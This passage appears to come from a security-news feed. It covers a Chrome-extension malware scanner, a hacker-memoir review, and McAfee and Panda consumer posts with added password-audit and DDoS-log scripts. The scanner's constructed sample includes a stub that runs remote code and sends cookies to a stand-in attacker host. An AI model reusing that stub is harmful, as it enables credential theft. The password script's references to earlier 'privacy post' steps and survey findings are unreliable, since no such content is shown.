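    "hides_extensions_page": re.compile(r"chrome://extensions[\s\S]{0,300}?chrome\.tabs\.remove"),
    "facebook_token_grab": re.compile(r"access_token|graph\.facebook\.com"),
}


def scan_manifest(manifest):
    """Flag permissions and content-script matches that enable credential theft."""
    requested = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):
        requested.update(cs.get("matches", []))
    findings = []
    for entry in sorted(requested):
        if entry in RISKY_PERMISSIONS:
            findings.append(("permission", entry))
        elif any(h in entry for h in SOCIAL_HOSTS):
            findings.append(("social_host", entry))
    return findings


def scan_script(path, source):
    """Regex indicators for a short obfuscated stub and for what it does."""
    findings = []
    for label, pattern in OBFUSCATION.items():
        if pattern.search(source):
            findings.append(("obfuscation", f"{path}: {label}"))
    for label, pattern in BEHAVIOUR.items():
        if pattern.search(source):
            findings.append(("behaviour", f"{path}: {label}"))
    return findings


def triage(files):
    """files maps path -> text for an unpacked extension. Returns (verdict, findings)."""
    findings = scan_manifest(json.loads(files["manifest.json"]))
    for path, source in files.items():
        if path.endswith(".js"):
            findings.extend(scan_script(path, source))
    kinds = {kind for kind, _ in findings}
    if "obfuscation" in kinds and "behaviour" in kinds:
        verdict = "likely-malicious"    # hides what it does AND does something sensitive
    elif kinds:
        verdict = "review"
    else:
        verdict = "clean"
    return verdict, findings


# Constructed sample: a copycat of a picture-replacing extension with an injected stub.
COPYCAT = {
    "manifest.json": json.dumps({
        "name": "Nigelify (copy)", "manifest_version": 2, "version": "1.0",
        "permissions": ["tabs", "cookies", "storage", "*://*.facebook.com/*", "*://*.instagram.com/*"],
        "background": {"scripts": ["bg.js"]},
        "content_scripts": [{"matches": ["*://*/*"], "js": ["content.js"]}],
    }),
    "content.js": "document.querySelectorAll('img').forEach(function (i) { i.src = chrome.runtime.getURL('nigel.png'); });",
    "bg.js": (
        "var k = String.fromCharCode(97,99,99,101,115,115,95,116,111,107,101,110);\n"  # hides 'access_token'
        "fetch('https://c2.attacker.invalid/php3/config.php').then(function (r) { return r.text(); })"
        ".then(function (t) { eval(atob(t)); });\n"
        "chrome.cookies.getAll({domain: 'instagram.com'}, function (c) {"
        " navigator.sendBeacon('https://c2.attacker.invalid/c', JSON.stringify(c)); });\n"
        "chrome.tabs.onUpdated.addListener(function (id, info, tab) {\n"
        "  if (tab.url && tab.url.indexOf('chrome://extensions') === 0) { chrome.tabs.remove(id); }\n"
        "});\n"
    ),
}
# Constructed sample: the benign original the copycat imitates.
ORIGINAL = {
    "manifest.json": json.dumps({
        "name": "Nigelify", "manifest_version": 2, "version": "1.0", "permissions": ["storage"],
        "content_scripts": [{"matches": ["*://*.example.org/*"], "js": ["content.js"]}],
    }),
    "content.js": COPYCAT["content.js"],
}

if __name__ == "__main__":
    for label, ext in (("original", ORIGINAL), ("copycat", COPYCAT)):
        verdict, findings = triage(ext)
        print(label, verdict, *findings, sep="\n  ")
```

The copycat sample deliberately builds the string “access_token” from character codes, so the literal-string indicator misses it while the fromCharCode indicator catches the trick; that is the point of pairing obfuscation indicators with behaviour indicators rather than scoring either alone, since legitimate minified libraries trip the first and legitimate cookie managers trip the second.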

Pierluigi Paganini

(Security Affairs – Nigelthorn malware, Facebook)

The post Nigelthorn malware infected over 100,000 systems abusing Chrome extensions appeared first on Security Affairs.

Chili’s Restaurants Hit by Payment Card Breach

People who recently paid with their credit or debit card at a Chili’s restaurant may have had their information stolen by cybercriminals, according to Dallas-based Brinker International.

Brinker, which operates more than 1,600 Chili’s and Maggiano’s restaurants across 31 countries, issued a notice shortly after the data breach was discovered on May 11.


Security Affairs newsletter Round 162 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      European Central Bank announced a framework for cyber attack simulation on financial firms
·      Google announces the open-source Asylo framework for confidential computing
·      New ZooPark APT targets Android users in Middle East since 2015
·      A new report sheds light on state-sponsored Chinese APTs under the Winnti umbrella
·      Chrome freezes PC running Windows OS after Windows 10 April update
·      SynAck ransomware Employs Many Novel Techniques to Avoid Detection
·      Experts released an unofficial patch for Zero-Days in Dasan GPON home routers
·      Hackers continue to hack Drupal installs to install backdoors and inject cryptocurrency malware
·      Reading the 2017 Internet Crime Complaint Center (IC3) report
·      Secret Conversation – Twitter is testing End-to-End Encryption for direct messages
·      UPDATED – Critical RCE vulnerability found in over a million GPON Home Routers
·      Adobe fixed a Critical Code Execution issue in Flash Player
·      Are you using the Python module ‘SSH Decorator’? Newer versions include a backdoor
·      baseStriker attack technique allows bypassing the Microsoft Office 365 anti-phishing filter
·      May 2018 Android Security Bulletin includes additional Meltdown fix
·      May 2018 Patch Tuesday: Microsoft fixes 2 zero-day flaws reportedly exploited by APT group
·      Signal disappearing messages can be recovered by the macOS client
·      Analysis of CVE-2018-8174 VBScript 0day and APT actor related to Office targeted attack
·      Lenovo releases updates to fix Secure Boot flaw in servers and other issues
·      Misinterpretation of Intel docs is the root cause for the CVE-2018-8897 flaw in Hypervisors and OSs
·      The source code of the TreasureHunter PoS Malware leaked online
·      Allanite threat actor focused on critical infrastructure is targeting electric utilities and ICS networks
·      Mining passwords from dozens of public Trello boards
·      Tech giant Telstra warns cloud customers they’re at risk of hack due to a SNAFU
·      Throwhammer, the new Rowhammer attack to remotely hack systems over the LAN
·      Google addresses critical security vulnerabilities in Chrome 66
·      iVideon Russian-based video surveillance solution leaked data, hundreds of thousands of records exposed
·      Wannacry outbreak anniversary: the EternalBlue exploit even more popular now


Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 162 – News of the week appeared first on Security Affairs.

How to Steal a Million: The Memoirs of a Russian Hacker

As a university researcher specializing in cybercrime, I've had the opportunity to watch the Russian carding market closely and write about it frequently on my blog "Cybercrime & Doing Time."  Sometimes this leads to interactions with the various criminals that I have written about, which was the case with Sergey.  I was surprised last January to be contacted and to learn that he had completed a ten-year prison sentence and had written a book.   I have to say, I wasn't expecting much.  This was actually the third time a cybercriminal had tried to get my interest in a book they had written, and the first two were both horrible and self-promotional.  I agreed to read his first English draft, which he sent me in January 2017.

I was absolutely hooked from page 1.  As I have told dozens of friends since then, his story-telling vehicle is quite good.  The book starts with him already in prison, and in order to teach the reader about carding and cybercrime, a lawyer visits him periodically in prison, providing the perfect foil  needed to explain key concepts to the uninitiated, such as interrupting one of Sergey's stories to ask "Wait.  What is a white card?"
My copy of the book!

As someone who has studied cybercrime for more than 20 years, I was probably more excited than the average reader will be to see so many names and criminal forums and card shops that I recognized -- CarderPlanet, card shop runners such as Vladislav Khorokhorin AKA BadB and Roman Vega AKA Boa, and data breach and hacking specialists like Albert Gonzalez and Vladimir Drinkman, who served as the source of the cards that they were all selling.  These and many of the other characters in this book appeared regularly in this blog.  (A list is at the bottom of this article.)

Whether these names are familiar to the reader or not, one can't help but be drawn into this story of intrigue, friendship, and deception as Pavlovich and his friends detect and respond to the various security techniques that shopkeepers, card issuers, and the law enforcement world are using to try to stop them.  Sergey shows how a criminal can rise quickly in the Russian cybercrime world by the face-to-face networking that a $100,000 per month income can provide, jet-setting the world with his fellow criminals and using business air travel, penthouse hotel suites, cocaine and women to loosen the lips of his peers so he can learn their secrets, but he also shows how quickly these business relationships can shatter in the face of law enforcement pressure.

The alternating chapters of the book serve as a stark reminder of where such life choices lead, as Sergey reveals the harsh realities of life in a Russian prison.  Even these are fascinating, as the smooth-talking criminal does his best to learn the social structure of Russian prison and find a safe place for himself on the inside.  The bone-crushing beatings, the deprivation of food and privacy, and the fear of never knowing which inmate or prison guard will snap next in a way that could seriously harm or kill him are a constant reminder that eventually everyone gets caught, and when they do, the consequences are extreme.

Sergey's original English manuscript has been greatly improved with the help of feedback from pre-readers and some great editors. After my original read, I told Sergey "I LOVE the story delivery mechanism, and there are fascinating stories here, but there are a few areas that really need some work."  It's clear that he took feedback like this seriously.  The new book, released in May 2018, is markedly improved without taking anything away from the brilliant story-telling of a fascinating criminal career ending with a harsh encounter with criminal justice.

A purchase link to get the book from Amazon: How to Steal a Million: The Memoirs of a Russian Hacker

The book was extremely revealing to me, helping me to understand just how closely linked the various Russian criminals are to each other, as well as revealing that some brilliant minds, trained in Computer Science and Engineering, and left morally adrift in a land where corruption is a way of life and with little chance of gainful employment, will apply those brilliant minds to stealing our money.

I seriously debated whether I should support this book.  Many so-called "reformed" criminals have reached out to me in the past, asking me to help them with a new career by meeting with them, recommending their services, or helping them find a job.  It is a moral dilemma.  Do I lend assistance to a man who stole millions of dollars from thousands of Americans?  Read the book.  To me, the value of this book is that it is the story of a criminal at the top of his game, betrayed by his colleagues and getting to face the reality of ten years in a Russian prison.  I think the book has value as a warning -- "a few months or even a couple of years of the high life is not worth the price you will pay when it all comes crashing down."

Links to selected blog articles that feature Pavlovich's cast of characters:

May 12, 2008 TJX and Dave and Busters - Maksym Yastremskiy (Maksik), Aleksandr Suvorov (JonnyHell) and Albert Gonzalez (Segvec) and their role in the TJX Data Breach.

August 5, 2008 TJX Reminder: We Will Arrest You and We Will Send You To Jail - some of the legal aftermath of the case above.

August 8, 2008 TJX: the San Diego Indictments where the US government indicts:
  • SERGEY ALEXANDROVICH PAVLOVICH, aka Panther, aka Diplomaticos, aka PoL1Ce Dog, aka Fallen Angel, aka Panther757
  • DZMITRY VALERYEVICH BURAK, aka Leon, aka Graph, aka Wolf
  • SERGEY VALERYEVICH STORCHAK, aka Fidel
and charges them with violation of "18 USC Section 1029(b)(2) Conspiracy to Traffic Unauthorized Access Devices"

May 9, 2013 ATM Cashers in 26 Countries Steal $40M talks about BadB's role in "Unlimited" ATM cash-out schemes, and his arrest in 2010 and sentencing to 88 months in 2013.

Jan 14, 2014 Target Breach Considered in Light of Drinkman/Gonzalez Data Breach Gang talked about Albert Gonzalez, Vladimir Drinkman, and how there seemed to be such a strong pattern of behavior - a script, if you will - to how criminals were conducting the major data breaches of that time.

Jan 27, 2014 Roman Vega (CarderPlanet's BOA) Finally Gets His Sentence addressed the plight of Roman Vega, who had been drifting around in the American criminal justice system, unsentenced, from 2003 until 2013! Dmitry Golubov AKA Script, the "godfather of CarderPlanet" is also discussed in this post.



Keep Your Mum Safe This Mother’s Day!

On my first Mother’s Day 21 years ago, I received a pair of gorgeous fluffy pink slippers. Last year – it was a sleek shiny green Fitbit! Technology has absolutely transformed our gift giving and Mother’s Day is no exception.

The rising popularity of internet connected gifts means many lucky mums will receive a glossy new device on Mother’s Day. It may be a digital home assistant, a fitness tracker or even a big new Smart TV. Whatever it is, we must understand the potential risks involved when giving or receiving an internet enabled device. Because we don’t want to put our mums (or our families) at risk.

But don’t let this change your shopping plans! Like anything in life, if you’re prepared you can minimise the risks and avoid getting caught out by cyber threats. So, here is the low-down on threats posed by some of the more popular gifts this Mother’s Day and tips on how to protect against them.

Digital Home Assistants

Regardless of which brand you might choose, a digital assistant can be a massive help for any busy mum.  Whether it’s reading the kids a bedtime story, reading out a recipe while you cook, or setting timers – it’s the closest thing many mums can get to another set of hands!

However, there are risks associated with these mother’s helpers. If your home assistant is hacked, your personal information could be at risk, which means your bank account details or your identity could be exposed. And as the device is ‘always on’, your personal assistant can listen to and record what is being said around your house – a definite privacy issue.

What to Do to Stay Safe

  • Protecting your Home Wi-Fi is an essential step to ensuring your home assistant is secure. Solutions such as McAfee’s Secure Home Platform, available soon on D-Link routers, will secure all your devices that connect to your Home Wi-Fi, including your home assistant. So, you have protection and peace of mind.
  • Always change the manufacturer’s default password when setting up the Wi-Fi and ensure you create a complex, unique one instead. A combination of lower and upper-case letters, numbers and special characters is ideal.
  • Don’t allow your home assistant to store your private information. I also advise against allowing your home assistant to store passwords, credit card data, or any of your contact information.
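
The advice in steps 2 and 4 of the privacy post earlier on this page (unique passwords everywhere, factory defaults changed on every device) and in the home-assistant tips just above all amount to one audit you can run over the household. The Python below is an added example, not McAfee’s software: it takes a constructed inventory of devices and accounts and flags factory-default credentials, common passwords, passwords too short for their character set, and any password that appears on more than one account. The default-credential list, the per-word entropy figure for passphrases and the 60-bit floor are assumptions for the example.

```python
"""Credential hygiene audit for a household's devices and accounts.

Added example, not McAfee's software. The inventory, the default-credential
list and the entropy constants are constructed/assumed for illustration.
"""
import math
import re
from collections import defaultdict

# Illustrative factory defaults; a real audit loads a vendor-specific list.
KNOWN_DEFAULTS = {("admin", "admin"), ("admin", "password"), ("admin", "1234"),
                  ("admin", ""), ("root", "root"), ("user", "user")}
COMMON_PASSWORDS = {"password", "123456", "qwerty", "letmein", "welcome", "iloveyou"}
BITS_PER_PASSPHRASE_WORD = 12.9   # assumption: words drawn from a 7776-word Diceware-style list
MIN_BITS = 60                     # assumed acceptable floor for an online account


def estimate_bits(password):
    """Rough strength: word count for a spaced passphrase, else log2(pool) * length."""
    words = re.findall(r"[A-Za-z]+", password)
    if " " in password.strip() and len(words) >= 4:
        return len(words) * BITS_PER_PASSPHRASE_WORD
    pool = 0
    for pattern, size in ((r"[a-z]", 26), (r"[A-Z]", 26), (r"\d", 10), (r"[^A-Za-z0-9]", 33)):
        if re.search(pattern, password):
            pool += size
    return len(password) * math.log2(pool) if pool else 0.0


def audit(inventory, min_bits=MIN_BITS):
    """inventory: list of {'name', 'username', 'password'}. Returns [(name, issue), ...]."""
    issues = []
    by_password = defaultdict(list)
    for item in inventory:
        name, user, pw = item["name"], item["username"], item["password"]
        by_password[pw].append(name)
        if (user.lower(), pw.lower()) in KNOWN_DEFAULTS:
            issues.append((name, "factory default credential"))
        elif pw.lower() in COMMON_PASSWORDS:
            issues.append((name, "common password"))
        elif estimate_bits(pw) < min_bits:
            issues.append((name, f"weak (~{estimate_bits(pw):.0f} bits)"))
    # Reuse is checked across the whole inventory, so a strong password still fails here.
    for pw, names in by_password.items():
        if len(names) > 1:
            issues.extend((n, f"reused across {len(names)} accounts") for n in names)
    return issues


# Constructed inventory; none of these are real credentials.
HOUSEHOLD = [
    {"name": "Home router",         "username": "admin",  "password": "admin"},
    {"name": "Smart TV",            "username": "user",   "password": "user"},
    {"name": "Fitness tracker app", "username": "alex.t", "password": "password"},
    {"name": "Smart speaker",       "username": "alex",   "password": "Summer2018!"},
    {"name": "Email",               "username": "alex",   "password": "Summer2018!"},
    {"name": "Online banking",      "username": "alex",   "password": "purple giraffe eats thunder quietly"},
    {"name": "Baby monitor",        "username": "alex",   "password": "Mum2018"},
]

if __name__ == "__main__":
    for name, issue in audit(HOUSEHOLD):
        print(f"{name}: {issue}")
```

The entropy estimate is deliberately generous (it assumes every character was chosen uniformly from the pool, which people never do), so treat a failing score as certain and a passing score as no more than a hint; the default-credential and reuse checks are the ones that correspond to the survey findings quoted earlier on this page.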

Fitness Trackers

A wearable fitness tracker might be at the top of your mum’s wish list this Mother’s Day. But there are some surprisingly worrying security risks surrounding the popular gift that she should be aware of.

Researchers have found it is possible to infer PINs and passwords from a tracker’s motion sensors, which record your hand movements. Other research has shown that the encryption used by some wearable fitness tracker manufacturers is weak enough that the traffic between the device and its app can be intercepted and read. This means the personal data stored on the device can be captured. And while information like your calorie intake and step count may not seem valuable to a hacker, knowing where you worked out and how long you were away from home paints a very valuable picture of who you are!

What to Do to Stay Safe

  • Keep your fitness tracker up-to-date. Just like with any connected device, as soon as software updates become available, download them immediately to prevent cyber criminals from hacking your device.
  • Set up your fitness tracker and any associated online accounts with an obscure user name and unique passwords, that are completely unrelated to any of your other accounts.
  • Read the Privacy Policy of the device or app you are considering buying. Make sure you are comfortable with the company’s commitment to protecting your data.
  • Consider disabling certain features of the fitness tracker if you feel that your privacy may be jeopardised.

Smart TVs

Whilst buying mum a smart TV would certainly make her feel spoilt this Mother’s Day, they can come with a more sinister side. In March 2017, news emerged that it may be possible to hack into smart TVs to spy on users. Since then, several critical vulnerabilities have been found in Vestel firmware, which is used in more than 30 popular TV brands. These vulnerabilities could be easily leveraged to spy on smart TV users through the microphones and cameras.

What to Do to Stay Safe

  • Buy smart TVs with security in mind. When purchasing a smart TV, it’s always important to do your homework and read up on any current vulnerabilities.
  • Secure your home’s internet at the source. Smart TVs, like all connected devices, must connect to a home Wi-Fi network to run. If they’re vulnerable, they could expose your network as a whole. Since it can be challenging to lock down all the IoT devices in a home, again a solution like McAfee Secure Home Platform can provide protection at the router level.

If you are shopping online for mum, please remember to keep your guard up. Only shop from secure websites where the URL begins with ‘https://’ and a lock icon appears in the address bar. NEVER, EVER shop using unsecured Wi-Fi. It can leave you vulnerable to all sorts of nasty attacks and your private information may be hacked by a third party.

Finally, and most importantly, don’t forget to thank your wonderful mum for everything she has done for you. A handwritten card with a few lines of thanks is extremely powerful!!

Happy Mother’s Day!!

Alex xx


The post Keep Your Mum Safe This Mother’s Day! appeared first on McAfee Blogs.

Webstresser.org has been seized

Police take down a major cybercrime resource

A recent global raid conducted by police in the UK, US and the Netherlands has helped to take down a major cybercrime resource called WebStresser. The WebStresser website allowed anyone with a credit card to “buy” a distributed denial of service (DDoS) attack on another website of their choice.

What are DDoS attacks?

A DDoS attack uses a network of bots to flood a target website with traffic. Each bot attempts to access the website hundreds of times each minute; eventually there are too many access attempts for the website to handle and it crashes.

It can take many hours for a website to recover from a DDoS attack. Ecommerce sites could lose thousands of dollars during that time because genuine buyers cannot make purchases.

The DDoS attack technique is reliant on thousands of bots to generate the necessary traffic to overload a website. Normally hackers need to infect thousands of computers with malware to create the bot network – a process that can take days or weeks to complete, and which could cost thousands of dollars to set up.
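The per-source flood pattern described above (each bot hitting the site hundreds of times a minute) is something a site operator can look for in ordinary web-server logs. The following is an added example, not code from the Panda Security post: a small Python detector that parses combined-format access-log lines, counts requests per client IP per minute, and flags both a single chatty source and minutes where the total volume spread across many sources exceeds the site's normal capacity. The sample log lines are constructed for the example (documentation IP ranges), and the two thresholds are illustrative assumptions, not figures from the post.

```python
"""Request-rate detector over web-server access logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/Nginx "combined" format: ip - - [time] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Parse one combined-format log line; return None if it is malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("time"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "time": ts, "status": int(m.group("status"))}


def count_per_source_minute(lines):
    """Bucket requests by (client IP, minute). Malformed lines are skipped."""
    counts = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        minute = rec["time"].replace(second=0, microsecond=0)
        counts[(rec["ip"], minute)] += 1
    return counts


def flag_noisy_sources(lines, per_source_threshold=100):
    """Sources exceeding the per-minute threshold in any minute.
    Returns a sorted list of (ip, minute_iso, count)."""
    counts = count_per_source_minute(lines)
    return sorted((ip, minute.isoformat(), n)
                  for (ip, minute), n in counts.items()
                  if n > per_source_threshold)


def flag_busy_minutes(lines, site_threshold=1000):
    """Minutes whose total request count exceeds the site's assumed capacity,
    with the number of distinct sources. Catches a distributed flood in which
    every bot stays under the per-source threshold."""
    counts = count_per_source_minute(lines)
    total, sources = defaultdict(int), defaultdict(set)
    for (ip, minute), n in counts.items():
        total[minute] += n
        sources[minute].add(ip)
    return sorted((m.isoformat(), total[m], len(sources[m]))
                  for m in total if total[m] > site_threshold)


def make_sample_log():
    """Constructed sample log: one chatty source and one normal visitor in the
    first minute, then 300 bots sending two requests each in the next minute."""
    base = datetime(2018, 4, 25, 10, 0, 0, tzinfo=timezone.utc)
    fmt = '{ip} - - [{t}] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"'

    def line(ip, t):
        return fmt.format(ip=ip, t=t.strftime("%d/%b/%Y:%H:%M:%S %z"))

    lines = ["not a log line at all"]  # malformed line, must be skipped
    for i in range(150):  # 150 requests from one address (TEST-NET-3)
        lines.append(line("203.0.113.7", base + timedelta(milliseconds=400 * i)))
    for i in range(3):  # an ordinary visitor
        lines.append(line("203.0.113.200", base + timedelta(seconds=10 * i)))
    bot_ips = ["192.0.2.%d" % i for i in range(1, 255)] + \
              ["198.51.100.%d" % i for i in range(1, 47)]  # 300 addresses
    for k, ip in enumerate(bot_ips):  # distributed flood, two requests each
        t = base + timedelta(seconds=60, milliseconds=100 * k)
        lines.append(line(ip, t))
        lines.append(line(ip, t + timedelta(milliseconds=50)))
    return lines


if __name__ == "__main__":
    sample = make_sample_log()
    print("chatty sources:", flag_noisy_sources(sample, 100))
    print("busy minutes (total, distinct sources):", flag_busy_minutes(sample, 500))
```

The per-source check alone would miss the second minute, where no single bot sends more than two requests; combining it with an aggregate check on total volume and distinct-source count is what makes the distributed case visible.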

The WebStresser difference

But when using the WebStresser service, anyone could access a network of preconfigured bots instantly. Even more concerning for website owners was the cost of using WebStresser – DDoS attacks could be bought for as little as $15.

This low entry price meant that anyone with a grudge could attack a website – even if they had no technical skills, or experience of hacking. The police believe that thousands of websites were targeted using the WebStresser service before it was taken offline.

A temporary win

Although WebStresser has gone, it is only a matter of time before a copycat service launches. Now that cybercriminals know they can make money from running a DDoS botnet, it is only a matter of time before we see similar hack-for-cash services pop up elsewhere.

You can play your part

Home users are very unlikely to find themselves the target of a distributed denial of service attack – but that’s not to say you will never be part of one. The WebStresser service used a network of compromised PCs just like your own as part of the attack.

Unprotected computers are infected with malware that sits dormant until required. When the DDoS attack is launched, these infected computers are then called into action, to target a specific website. Chances are that you will never even know that your computer has become part of a zombie network until an attack begins and your computer slows down.

To avoid becoming an unwitting accomplice, you must ensure that your PC is regularly updated, and that you have a comprehensive antimalware system installed. This combination will help to prevent malware from infecting your PC.

Play your part in making the web a safer place (and stop your PC slowing down too) by downloading a free Panda Dome trial today.

The post Webstresser.org has been seized appeared first on Panda Security Mediacenter.

Mobile Menace Monday: re-emergence of a fake Android AV

Back in early 2013, a new mobile antivirus (AV) company called Armor for Android emerged into the mobile security software industry that had everyone perplexed. It seemed eerily like malware known as a Fake AV, and some even gave it that label. As a younger mobile researcher, I was one of those who gave it such a label, adding it to a list of malware detections. Shortly after, Armor for Android contacted the security company I worked for at the time and demanded their detection be removed.

As a rebuttal, I wrote a blog to fire back with evidence that there was no way this AV company could be legitimate—despite it being on Google Play. I never published that blog because I was thrown off by something that had me questioning everything: the AV company was tested by a reputa